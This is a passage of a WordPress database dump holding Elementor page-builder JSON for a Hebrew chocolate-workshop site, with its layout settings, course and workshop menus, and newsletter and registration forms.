":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"Your Email\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"49cd254f\",\"elType\":\"section\",\"settings\":{\"border_border\":\"dotted\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"rgba(255,255,255,0.56)\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3f5ce056\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":40,\"_inline_size_mobile\":40},\"elements\":[{\"id\":\"6653aa2c\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":70},\"image\":{\"id\":38,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(209,55,'_elementor_version','0.4'),(210,56,'_wp_page_template','elementor_canvas'),(211,56,'_elementor_edit_mode','builder'),(212,56,'_elementor_template_type','post'),(213,56,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 